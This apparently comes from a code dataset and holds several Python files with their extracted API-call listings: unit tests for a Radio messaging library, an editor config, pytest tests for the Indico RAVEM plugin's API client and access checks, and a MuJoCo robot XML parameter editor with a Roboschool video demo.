foo_handler(): pass self.radio.stopReplying('foo', foo_handler, soft=True) self.radio.stopReplying('foo', foo_handler, soft=True) @init_radio def test_trigger_fail_on_incorrect_arguments(self): ''' "request" fails when arguments for handler is incorrect. ''' def foo_handler(required_arg): pass self.radio.reply('foo', foo_handler) with self.assertRaises(TypeError): self.radio.request('foo') suite = TestLoader().loadTestsFromTestCase(TestRadioRequestReplyMethods)
[ "radio.Radio", "unittest.TestLoader" ]
[((248, 255), 'radio.Radio', 'Radio', ([], {}), '()\n', (253, 255), False, 'from radio import Radio, ListenerNotFound, ReplyHandlerAlreadyBound, HandlerAlreadyBound\n'), ((3016, 3028), 'unittest.TestLoader', 'TestLoader', ([], {}), '()\n', (3026, 3028), False, 'from unittest import TestCase, TestLoader\n')]
import os import sys DIR_OF_THIS_SCRIPT = os.path.abspath( os.path.dirname( __file__ ) ) def Settings( **kwargs ): return { 'interpreter_path': sys.executable, 'sys_path': [ os.path.join( DIR_OF_THIS_SCRIPT, 'third_party' ) ] }
[ "os.path.dirname", "os.path.join" ]
[((60, 85), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (75, 85), False, 'import os\n'), ((187, 234), 'os.path.join', 'os.path.join', (['DIR_OF_THIS_SCRIPT', '"""third_party"""'], {}), "(DIR_OF_THIS_SCRIPT, 'third_party')\n", (199, 234), False, 'import os\n')]
# This file is part of the CERN Indico plugins. # Copyright (C) 2014 - 2022 CERN # # The CERN Indico plugins are free software; you can redistribute # them and/or modify them under the terms of the MIT License; see # the LICENSE file for more details. from unittest.mock import MagicMock import pytest from requests.exceptions import HTTPError, Timeout from indico.testing.util import extract_logs from indico_ravem.plugin import RavemPlugin from indico_ravem.util import has_access, ravem_api_call @pytest.mark.usefixtures('db') @pytest.mark.parametrize('method', ('get', 'post')) def test_correct_http_method(mocker, method): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response ravem_api_call('test_endpoint', method=method, param1='test1', param2='test2') assert request.call_count == 1 assert request.call_args[0][0] == method @pytest.mark.usefixtures('db') def test_correct_auth_method(mocker): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response token = 'foo' RavemPlugin.settings.set('access_token', token) ravem_api_call('test_endpoint', param1='test1', param2='test2') assert request.call_count == 1 assert 'Authorization' in request.call_args[1]['headers'] assert request.call_args[1]['headers']['Authorization'] == 'Bearer %s' % token @pytest.mark.usefixtures('db') def test_accepts_json(mocker): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response ravem_api_call('test_endpoint', param1='test1', param2='test2') assert request.call_count == 1 assert request.call_args[1]['headers']['Accept'] == 'application/json' @pytest.mark.usefixtures('db') @pytest.mark.parametrize(('root_endpoint', 'endpoint', 'expected_url'), ( ('https://ravem.test/', 'final_endpoint', 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/', 'final_endpoint', 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/', 'final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test', './final_endpoint', 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/', './final_endpoint', 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/', './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test', 'sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/', 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), ('https://ravem.test/api/v2/', 'sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test', './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/', './sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), ('https://ravem.test/api/v2/', './sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/', '', 'https://ravem.test/'), ('https://ravem.test/api/', '', 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '', 'https://ravem.test/api/v2/'), )) def test_correct_api_endpoint(mocker, root_endpoint, endpoint, expected_url): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response RavemPlugin.settings.set('api_endpoint', root_endpoint) ravem_api_call(endpoint, param1='test1', param2='test2') assert request.call_count == 1 assert request.call_args[0][1] == expected_url @pytest.mark.usefixtures('db') @pytest.mark.parametrize('params', ( {}, {'p1': '1stparam'}, {'p1': '1stparam', 'p2': '2ndparam'} )) def test_params_generated(mocker, params): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response ravem_api_call('test_endpoint', params=params) assert request.call_count == 1 assert request.call_args[1]['params'] == params @pytest.mark.usefixtures('db') def test_raises_timeout(mocker): request = mocker.patch('indico_ravem.util.requests.request') request.side_effect = Timeout('Timeout test error message', request=request) with pytest.raises(Timeout) as excinfo: ravem_api_call('test_endpoint') assert str(excinfo.value) == "Timeout while contacting the room." assert request.call_count == 1 @pytest.mark.usefixtures('db') @pytest.mark.parametrize(('method', 'params'), ( ('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2': '2ndparam'}) )) def test_unexpected_exception_is_logged(mocker, caplog, method, params): request = mocker.patch('indico_ravem.util.requests.request') request.side_effect = IndexError('this is unexpected') with pytest.raises(IndexError) as excinfo: ravem_api_call('test_endpoint', method=method, **params) assert str(excinfo.value) == 'this is unexpected' log = extract_logs(caplog, one=True, name='indico.plugin.ravem') assert log.message == "failed call: {} {} with {}: {}".format(method.upper(), 'test_endpoint', params, 'this is unexpected') assert request.call_count == 1 @pytest.mark.usefixtures('db') @pytest.mark.parametrize(('method', 'params'), ( ('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2': '2ndparam'}) )) def test_http_error_is_logged(mocker, caplog, method, params): request = mocker.patch('indico_ravem.util.requests.request') request.method = method.upper() request.url = RavemPlugin.settings.get('api_endpoint') + 'test_endpoint' response = MagicMock() response.raise_for_status.side_effect = HTTPError('Well this is embarrassing') response.request = request response.url = response.request.url request.return_value = response with pytest.raises(HTTPError) as excinfo: ravem_api_call('test_endpoint', method=method, **params) assert str(excinfo.value) == 'Well this is embarrassing' log = extract_logs(caplog, one=True, name='indico.plugin.ravem') assert log.message == '{} {} failed with {}'.format( method.upper(), RavemPlugin.settings.get('api_endpoint') + 'test_endpoint', 'Well this is embarrassing') assert request.call_count == 1 @pytest.mark.usefixtures('db') def test_unlinked_event_vc_room_has_no_access(): event_vc_room = MagicMock() event_vc_room.link_object = None assert not has_access(event_vc_room) @pytest.mark.usefixtures('db', 'request_context') def test_unlinked_room_has_no_access(mocker): session = mocker.patch('indico_ravem.util.session') session.user = '<NAME>' event_vc_room = MagicMock() event_vc_room.link_object.room = None assert not has_access(event_vc_room) @pytest.mark.usefixtures('db', 'request_context') def test_check_if_current_user_is_room_owner(mocker): session = mocker.patch('indico_ravem.util.session') session.user = '<NAME>' request = mocker.patch('indico_ravem.util.request') request.remote_addr = '192.168.127.12' retrieve_principal = mocker.patch('indico_ravem.util._retrieve_principal') retrieve_principal.side_effect = lambda x: session.user event_vc_room = MagicMock() event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True) event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr event_vc_room.vc_room.data.get.return_value = 'User:123' event_vc_room.event.can_manage.return_value = False assert has_access(event_vc_room) @pytest.mark.usefixtures('db', 'request_context') def test_check_if_current_user_can_modify(mocker): request = mocker.patch('indico_ravem.util.request') request.remote_addr = '192.168.127.12' session = mocker.patch('indico_ravem.util.session') session.user = '<NAME>' mocker.patch('indico_ravem.util._retrieve_principal') event_vc_room = MagicMock() event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True) event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr event_vc_room.event.can_manage.return_value = True assert has_access(event_vc_room) event_vc_room.event.can_manage.assert_called_once_with(session.user)
[ "unittest.mock.MagicMock", "indico.testing.util.extract_logs", "indico_ravem.plugin.RavemPlugin.settings.get", "indico_ravem.util.has_access", "pytest.mark.parametrize", "pytest.raises", "pytest.mark.usefixtures", "requests.exceptions.HTTPError", "indico_ravem.plugin.RavemPlugin.settings.set", "indico_ravem.util.ravem_api_call", "requests.exceptions.Timeout" ]
[((506, 535), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (529, 535), False, 'import pytest\n'), ((537, 587), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""method"""', "('get', 'post')"], {}), "('method', ('get', 'post'))\n", (560, 587), False, 'import pytest\n'), ((1033, 1062), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (1056, 1062), False, 'import pytest\n'), ((1655, 1684), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (1678, 1684), False, 'import pytest\n'), ((2130, 2159), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (2153, 2159), False, 'import pytest\n'), ((2161, 3611), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('root_endpoint', 'endpoint', 'expected_url')", "(('https://ravem.test/', 'final_endpoint',\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'final_endpoint',\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\n 'https://ravem.test/api/', './final_endpoint',\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\n 'https://ravem.test', 'sub/final_endpoint',\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\n 'https://ravem.test/api/', './sub/final_endpoint',\n 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\n 'https://ravem.test/api/v2/'))"], {}), "(('root_endpoint', 'endpoint', 'expected_url'), ((\n 'https://ravem.test/', 'final_endpoint',\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'final_endpoint',\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\n 'https://ravem.test/api/', './final_endpoint',\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\n 'https://ravem.test', 'sub/final_endpoint',\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\n 'https://ravem.test/api/', './sub/final_endpoint',\n 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\n 'https://ravem.test/api/v2/')))\n", (2184, 3611), False, 'import pytest\n'), ((4101, 4130), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (4124, 4130), False, 'import pytest\n'), ((4132, 4233), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""params"""', "({}, {'p1': '1stparam'}, {'p1': '1stparam', 'p2': '2ndparam'})"], {}), "('params', ({}, {'p1': '1stparam'}, {'p1':\n '1stparam', 'p2': '2ndparam'}))\n", (4155, 4233), False, 'import pytest\n'), ((4661, 4690), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (4684, 4690), False, 'import pytest\n'), ((5064, 5093), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (5087, 5093), False, 'import pytest\n'), ((5095, 5336), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('method', 'params')", "(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\n 'p1': '1stparam', 'p2': '2ndparam'}))"], {}), "(('method', 'params'), (('get', {}), ('post', {}), (\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\n '2ndparam'})))\n", (5118, 5336), False, 'import pytest\n'), ((6017, 6046), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (6040, 6046), False, 'import pytest\n'), ((6048, 6289), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('method', 'params')", "(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\n 'p1': '1stparam', 'p2': '2ndparam'}))"], {}), "(('method', 'params'), (('get', {}), ('post', {}), (\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\n '2ndparam'})))\n", (6071, 6289), False, 'import pytest\n'), ((7213, 7242), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (7236, 7242), False, 'import pytest\n'), ((7406, 7454), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""', '"""request_context"""'], {}), "('db', 'request_context')\n", (7429, 7454), False, 'import pytest\n'), ((7705, 7753), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""', '"""request_context"""'], {}), "('db', 'request_context')\n", (7728, 7753), False, 'import pytest\n'), ((8491, 8539), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""', '"""request_context"""'], {}), "('db', 'request_context')\n", (8514, 8539), False, 'import pytest\n'), ((714, 725), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (723, 725), False, 'from unittest.mock import MagicMock\n'), ((870, 948), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'method': 'method', 'param1': '"""test1"""', 'param2': '"""test2"""'}), "('test_endpoint', method=method, param1='test1', param2='test2')\n", (884, 948), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((1181, 1192), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (1190, 1192), False, 'from unittest.mock import MagicMock\n'), ((1355, 1402), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', (['"""access_token"""', 'token'], {}), "('access_token', token)\n", (1379, 1402), False, 'from indico_ravem.plugin import RavemPlugin\n'), ((1407, 1470), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'param1': '"""test1"""', 'param2': '"""test2"""'}), "('test_endpoint', param1='test1', param2='test2')\n", (1421, 1470), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((1796, 1807), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (1805, 1807), False, 'from unittest.mock import MagicMock\n'), ((1952, 2015), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'param1': '"""test1"""', 'param2': '"""test2"""'}), "('test_endpoint', param1='test1', param2='test2')\n", (1966, 2015), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((3738, 3749), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (3747, 3749), False, 'from unittest.mock import MagicMock\n'), ((3894, 3949), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', (['"""api_endpoint"""', 'root_endpoint'], {}), "('api_endpoint', root_endpoint)\n", (3918, 3949), False, 'from indico_ravem.plugin import RavemPlugin\n'), ((3954, 4010), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['endpoint'], {'param1': '"""test1"""', 'param2': '"""test2"""'}), "(endpoint, param1='test1', param2='test2')\n", (3968, 4010), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((4367, 4378), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (4376, 4378), False, 'from unittest.mock import MagicMock\n'), ((4523, 4569), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'params': 'params'}), "('test_endpoint', params=params)\n", (4537, 4569), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((4815, 4869), 'requests.exceptions.Timeout', 'Timeout', (['"""Timeout test error message"""'], {'request': 'request'}), "('Timeout test error message', request=request)\n", (4822, 4869), False, 'from requests.exceptions import HTTPError, Timeout\n'), ((5725, 5783), 'indico.testing.util.extract_logs', 'extract_logs', (['caplog'], {'one': '(True)', 'name': '"""indico.plugin.ravem"""'}), "(caplog, one=True, name='indico.plugin.ravem')\n", (5737, 5783), False, 'from indico.testing.util import extract_logs\n'), ((6559, 6570), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (6568, 6570), False, 'from unittest.mock import MagicMock\n'), ((6615, 6653), 'requests.exceptions.HTTPError', 'HTTPError', (['"""Well this is embarrassing"""'], {}), "('Well this is embarrassing')\n", (6624, 6653), False, 'from requests.exceptions import HTTPError, Timeout\n'), ((6945, 7003), 'indico.testing.util.extract_logs', 'extract_logs', (['caplog'], {'one': '(True)', 'name': '"""indico.plugin.ravem"""'}), "(caplog, one=True, name='indico.plugin.ravem')\n", (6957, 7003), False, 'from indico.testing.util import extract_logs\n'), ((7312, 7323), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (7321, 7323), False, 'from unittest.mock import MagicMock\n'), ((7606, 7617), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (7615, 7617), False, 'from unittest.mock import MagicMock\n'), ((8151, 8162), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (8160, 8162), False, 'from unittest.mock import MagicMock\n'), ((8214, 8242), 'unittest.mock.MagicMock', 'MagicMock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (8223, 8242), False, 'from unittest.mock import MagicMock\n'), ((8462, 8487), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (8472, 8487), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((8853, 8864), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (8862, 8864), False, 'from unittest.mock import MagicMock\n'), ((8916, 8944), 'unittest.mock.MagicMock', 'MagicMock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (8925, 8944), False, 'from unittest.mock import MagicMock\n'), ((9102, 9127), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (9112, 9127), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((4880, 4902), 'pytest.raises', 'pytest.raises', (['Timeout'], {}), '(Timeout)\n', (4893, 4902), False, 'import pytest\n'), ((4923, 4954), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {}), "('test_endpoint')\n", (4937, 4954), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((5557, 5582), 'pytest.raises', 'pytest.raises', (['IndexError'], {}), '(IndexError)\n', (5570, 5582), False, 'import pytest\n'), ((5603, 5659), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'method': 'method'}), "('test_endpoint', method=method, **params)\n", (5617, 5659), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((6485, 6525), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', (['"""api_endpoint"""'], {}), "('api_endpoint')\n", (6509, 6525), False, 'from indico_ravem.plugin import RavemPlugin\n'), ((6771, 6795), 'pytest.raises', 'pytest.raises', (['HTTPError'], {}), '(HTTPError)\n', (6784, 6795), False, 'import pytest\n'), ((6816, 6872), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'method': 'method'}), "('test_endpoint', method=method, **params)\n", (6830, 6872), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((7377, 7402), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (7387, 7402), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((7676, 7701), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (7686, 7701), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((7085, 7125), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', (['"""api_endpoint"""'], {}), "('api_endpoint')\n", (7109, 7125), False, 'from indico_ravem.plugin import RavemPlugin\n')]
import numpy as np import xml.etree.ElementTree as ET class Geom(object): def __init__(self, geom): self.xml = geom self.params = [] def get_params(self): return self.params.copy() def set_params(self, new_params): self.params = new_params def update_point(self, p, new_params): pass def update_xml(self): pass def update(self, new_params): self.set_params(new_params) self.update_xml() def get_smallest_z(self): pass def get_param_limits(self): pass def get_param_names(self): pass def get_volume(self): pass class Sphere(Geom): min_radius = .05 max_radius = .4 def __init__(self, geom): self.xml = geom self.params = [float(self.xml.get('size'))] # radius self.center = np.array([float(x) for x in self.xml.get('pos').split()]) def update_point(self, p, new_params): return ((p - self.center) * new_params[0] / self.params[0]) + self.center def update_xml(self): self.xml.set('size', str(self.params[0])) def get_smallest_z(self): return self.center[2] - self.params[0] def get_param_limits(self): return [[self.min_radius], [self.max_radius]] def get_param_names(self): return ['radius'] def get_volume(self): return 4./3. * np.pi * self.params[0] ** 3 class Capsule(Geom): min_length = 0.175 max_length = 0.8 min_radius = 0.035 max_radius = 0.085 def __init__(self, geom): self.xml = geom fromto = [float(x) for x in self.xml.get('fromto').split()] self.p1 = np.array(fromto[:3]) self.p2 = np.array(fromto[3:]) length = np.sqrt(np.sum((self.p2 - self.p1) ** 2)) radius = float(self.xml.get('size')) self.params = [length, radius] self.axis = (self.p2 - self.p1) / length def update_point(self, p, new_params): lfac = p.dot(self.axis) * self.axis rfac = p - lfac return p + lfac * (-1.0 + new_params[0] / self.params[0])# + rfac * (new_params[1] / self.params[1]) def update_xml(self): self.xml.set('fromto', ' '.join([str(x) for x in np.concatenate([self.p1, self.p2])])) self.xml.set('size', str(self.params[1])) # radius def set_params(self, new_params): p1 = self.update_point(self.p1, new_params) p2 = self.update_point(self.p2, new_params) # update only after computing p1, p2 self.p1 = p1 self.p2 = p2 super().set_params(new_params) def get_smallest_z(self): return min(self.p1[2], self.p2[2]) - self.params[1] def get_param_limits(self): return [[self.min_length, self.min_radius], [self.max_length, self.max_radius]] def get_param_names(self): return ['length','radius'] def get_volume(self): return 4./3. * np.pi * self.params[1]**3 + self.params[0] * np.pi * self.params[1]**2 class Body: geoms = {'sphere': Sphere, 'capsule': Capsule} # dictionary of legal geometry types def __init__(self, body, worldbody=False): self.xml = body self.worldbody = worldbody geom_xml = body.find('geom') # assume only one geometry per body self.geom = self.geoms[geom_xml.get('type')](geom_xml) self.joints = [j for j in body.findall('joint') if 'ignore' not in j.get('name')] self.parts = [Body(b) for b in body.findall('body')] pos = [b.get('pos') for b in body.findall('body')] self.part_positions = [np.array([float(x) for x in p.split()]) for p in pos] pos = [j.get('pos') for j in self.joints] self.joint_positions = [np.array([float(x) for x in p.split()]) for p in pos] self.n = len(self.geom.get_params()) self.n_all_params = len(self.get_params()) self.zmin = float(self.xml.get("pos").split()[2]) - self.get_height() def get_height(self): max_height = -self.geom.get_smallest_z() for body, pos in zip(self.parts, self.part_positions): max_height = max(max_height, body.get_height() - pos[2]) return max_height def update_initial_position(self): pos = self.xml.get("pos").split() pos[2] = str(self.get_height() + self.zmin) self.xml.set("pos", ' '.join(pos)) def update_xml(self): for body, pos in zip(self.parts, self.part_positions): body.xml.set('pos', ' '.join([str(x) for x in pos])) for joint, pos in zip(self.joints, self.joint_positions): joint.set('pos', ' '.join([str(x) for x in pos])) def set_body_positions(self, new_params): for i, pos in enumerate(self.part_positions): self.part_positions[i] = self.geom.update_point(pos, new_params) for i, pos in enumerate(self.joint_positions): self.joint_positions[i] = self.geom.update_point(pos, new_params) def update(self, new_params): self.set_body_positions(new_params) self.geom.update(new_params) self.update_xml() def get_params(self): params = self.geom.get_params() for body in self.parts: params += body.get_params() return params def get_param_limits(self): limits = self.geom.get_param_limits() for body in self.parts: body_limits = body.get_param_limits() limits[0] += body_limits[0] limits[1] += body_limits[1] return limits def get_param_names(self): name = self.xml.get('name') param_names = [name + '-' + p for p in self.geom.get_param_names()] for body in self.parts: param_names += body.get_param_names() return param_names def update_params(self, new_params): if self.worldbody: assert len(new_params) == self.n_all_params, "Wrong number of parameters" self.update(new_params[:self.n]) remaining_params = new_params[self.n:] for body in self.parts: remaining_params = body.update_params(remaining_params) if self.worldbody: self.update_initial_position() else: return remaining_params def get_body_names(self): names = [self.xml.get('name')] for body in self.parts: names += body.get_names() return names def get_joints(self): joints = {} for body,pos in zip(self.parts, self.part_positions): for j in body.joints: joints[j.get('name')] = (self.xml.get('name'), body.xml.get('name'), self.geom, body.geom, pos) joints.update(body.get_joints()) return joints def get_volumes(self): volumes = {} if len(self.joints) > 0: for j in self.joints: v1 = self.geom.get_volume() v2 = sum([b.geom.get_volume() for b in self.parts]) volumes[j.get('name')] = np.array((v1, v2)) for body in self.parts: volumes.update(body.get_volumes()) return volumes class MuJoCoXmlRobot: def __init__(self, model_xml): self.model_xml = model_xml self.tree = ET.parse(self.model_xml) worldbody = self.tree.getroot().find('worldbody') self.body = Body(worldbody.find('body'), worldbody=True) def get_params(self): return self.body.get_params() def get_param_limits(self): return self.body.get_param_limits() def get_param_names(self): return self.body.get_param_names() def get_height(self): return self.body.get_height() def get_joints(self): return self.body.get_joints() def get_volumes(self): return self.body.get_volumes() def update(self, params, xml_file=None): if xml_file is None: xml_file = self.model_xml self.body.update_params(list(params)) self.tree.write(xml_file) if __name__ == '__main__': robot = MuJoCoXmlRobot('mujoco_assets/hopper.xml') params = list(1.0 * np.array(robot.get_params())) robot.update(params, 'mujoco_assets/hopper_test.xml') assert robot.get_params() == params #assert robot.get_height() == 1.31 print(robot.get_param_limits()) print(robot.get_param_names()) robot = MuJoCoXmlRobot('mujoco_assets/walker2d.xml') params = [.4,.04,.5,.05,.55,.055,.6,.06,.5,.05,.55,.055,.6,.06] robot.update(params, 'mujoco_assets/walker2d_test.xml') assert robot.get_params() == params assert robot.get_height() == 1.31 print(robot.get_param_limits()) print(robot.get_param_names()) robot = MuJoCoXmlRobot('mujoco_assets/ant.xml') params = [.2, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06] robot.update(params, 'mujoco_assets/ant_test.xml') assert robot.get_params() == params assert robot.get_height() == .2 print(robot.get_param_limits()) print(robot.get_param_names()) robot = MuJoCoXmlRobot('mujoco_assets/humanoid.xml') params = list(.8 * np.array(robot.get_params())) robot.update(params, 'mujoco_assets/humanoid_test.xml') assert robot.get_params() == params print(robot.get_height()) #assert robot.get_height() == .6085 print(robot.get_param_limits()) print(robot.get_param_names()) import gym, roboschool env = gym.make("RoboschoolHopper-v1") env.unwrapped.model_xml = 'mujoco_assets/hopper_test.xml' env.reset() #env.render() import os from scipy.misc import imsave import subprocess as sp outdir = 'xml_vid' os.makedirs(outdir, exist_ok=True) i = 0 for _ in range(10): env.reset() for _ in range(100): env.step(env.action_space.sample()) rgb = env.render('rgb_array') imsave(os.path.join(outdir, '{:05d}.png'.format(i)), rgb) i+=1 sp.call(['ffmpeg', '-r', '60', '-f', 'image2', '-i', os.path.join(outdir, '%05d.png'), '-vcodec', 'libx264', '-pix_fmt', 'yuv420p', os.path.join(outdir, 'out.mp4')]) env.close()
[ "xml.etree.ElementTree.parse", "os.makedirs", "os.path.join", "numpy.sum", "numpy.array", "numpy.concatenate", "gym.make" ]
